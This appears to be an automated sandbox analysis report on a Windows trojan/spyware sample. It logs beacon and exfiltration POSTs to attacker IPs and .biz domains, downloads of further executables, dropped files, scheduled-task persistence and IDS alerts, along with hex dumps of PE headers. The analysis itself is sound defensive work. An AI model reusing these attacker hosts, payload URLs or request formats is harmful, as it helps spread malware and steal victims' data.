b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 
a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:43:15 GMTContent-Type: application/octet-streamContent-Length: 1501214Last-Modified: Fri, 24 Jan 2025 15:07:02 GMTConnection: keep-aliveETag: "6793ac96-16e81e"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bd ea e2 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 24 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 d4 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 
48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d4 02 01 00 00 10 02 00 00 04 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 38 30 44 31 36 33 39 32 46 30 32 34 36 39 31 37 33 31 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 72 61 74 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 2d 2d 0d 0a Data Ascii: ------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="hwid"9480D16392F02469173176------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="build"brat------DHIECGCAEBFIIDHIDGIE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /manager/files/dedicleb.exe HTTP/1.1Host: 95.164.114.247
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053899001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 185.215.113.39If-Modified-Since: Sun, 26 Jan 2025 13:23:28 GMTIf-None-Match: "67963750-1d1000"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 35 33 39 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1053900001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 39 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053901001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 39 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053902001&unit=246122658369
Source: Joe Sandbox View IP Address: 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL (185.215.113.43)
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL (185.215.113.206)
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49741 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49763 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49796 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49999 -> 95.164.114.247:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50001 -> 185.215.113.39:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50002 -> 185.215.113.39:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50005 -> 185.215.113.39:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50008 -> 185.215.113.39:80
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UM9CNDVCN2PVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12823Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MUAE5FGINOQJRJKGDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15099Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2YRGEF3QTSCTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19927Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=861ES2CS7DD5TJPVBRWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2265Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YULN61TY5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572120Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: toppyneedus.biz
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16 (this event is reported 50 times in the original listing; collapsed here to one line)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001EBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 9_2_001EBE30
Source: global traffic DNS traffic detected: DNS query: measlyrefusz.biz
Source: global traffic DNS traffic detected: DNS query: impolitewearr.biz
Source: global traffic DNS traffic detected: DNS query: toppyneedus.biz
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toppyneedus.biz
Source: p199AjsEFs.exe, 00000000.00000003.2374928588.0000000000922000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2374899727.00000000055E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: p199AjsEFs.exe, 00000000.00000003.2374928588.0000000000922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Lf
Source: p199AjsEFs.exe, 00000000.00000003.2374928588.0000000000922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Za
Source: p199AjsEFs.exe, 00000000.00000003.2374980620.000000000090F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: p199AjsEFs.exe, 00000000.00000003.2374928588.0000000000922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe5
Source: p199AjsEFs.exe, 00000000.00000003.2374928588.0000000000922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe?
Source: p199AjsEFs.exe, 00000000.00000003.2374928588.0000000000922000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2374980620.000000000090F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: p199AjsEFs.exe, 00000000.00000003.2374928588.0000000000922000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/ua
Source: p199AjsEFs.exe, 00000000.00000003.2375047854.000000000092E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/mine/random.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: dedicleb.exe.9.dr, EventManager.cs .Net Code: ManagerApp

System Summary

Source: p199AjsEFs.exe Static PE information: section name:
Source: p199AjsEFs.exe Static PE information: section name: .idata
Source: p199AjsEFs.exe Static PE information: section name:
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name:
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: .idata
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name:
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name:
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: .idata
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: .idata
Source: random[1].exe.9.dr Static PE information: section name:
Source: crossplatformplayer.exe.13.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CrossPlatformPlayer.exe.14.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_00228860 9_2_00228860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_00227049 9_2_00227049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_002278BB 9_2_002278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_00222D10 9_2_00222D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_002231A8 9_2_002231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001E4DE0 9_2_001E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_00217F36 9_2_00217F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001E4B30 9_2_001E4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_0022779B 9_2_0022779B
Source: Joe Sandbox View Dropped File: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe A80F6C786A3E70DF146BCD6D9A3F59436D2E1121162B66D9DAEB9E30C5A9C3CC
Source: Joe Sandbox View Dropped File: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
Source: random[1].exe1.9.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 264662bead.exe.9.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 93f981a153.tmp.12.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 93f981a153.tmp.12.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 93f981a153.tmp.12.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-GPTU0.tmp.13.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-GPTU0.tmp.13.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-GPTU0.tmp.13.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: 264662bead.tmp.15.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 264662bead.tmp.15.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 264662bead.tmp.17.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 264662bead.tmp.17.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-0867F.tmp.18.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-0867F.tmp.18.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-SE3IR.tmp.18.dr Static PE information: Number of sections : 23 > 10
Source: is-DFNTB.tmp.13.dr Static PE information: Number of sections : 19 > 10
Source: sqlite3.dll.14.dr Static PE information: Number of sections : 19 > 10
Source: p199AjsEFs.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: p199AjsEFs.exe Static PE information: Section: ZLIB complexity 0.9982501971608833
Source: p199AjsEFs.exe Static PE information: Section: cwtcsdxi ZLIB complexity 0.9945848139632107
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: Section: npkeuccx ZLIB complexity 0.9946879521398111
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982916808583107
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: Section: npzhibgu ZLIB complexity 0.994113074018706
Source: skotes.exe.4.dr Static PE information: Section: ZLIB complexity 0.9982916808583107
Source: skotes.exe.4.dr Static PE information: Section: npzhibgu ZLIB complexity 0.994113074018706
Source: random[1].exe.9.dr Static PE information: Section: ZLIB complexity 1.0001273777173914
Source: random[1].exe.9.dr Static PE information: Section: qqtrmnsk ZLIB complexity 0.9945222034590261
Source: dedicleb.exe.9.dr, PrescriptionTracker.cs Security API names: File.GetAccessControl
Source: dedicleb.exe.9.dr, PrescriptionTracker.cs Security API names: File.SetAccessControl
Source: dedicleb.exe.9.dr, MoodBooster.cs Security API names: File.GetAccessControl
Source: dedicleb.exe.9.dr, MoodBooster.cs Security API names: File.SetAccessControl
Source: dedicleb.exe.9.dr, MoodBooster.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: dedicleb.exe.9.dr, FreelanceCalculator.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: dedicleb.exe.9.dr, FreelanceCalculator.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@32/56@3/6
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XE5PZ0HA.htm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
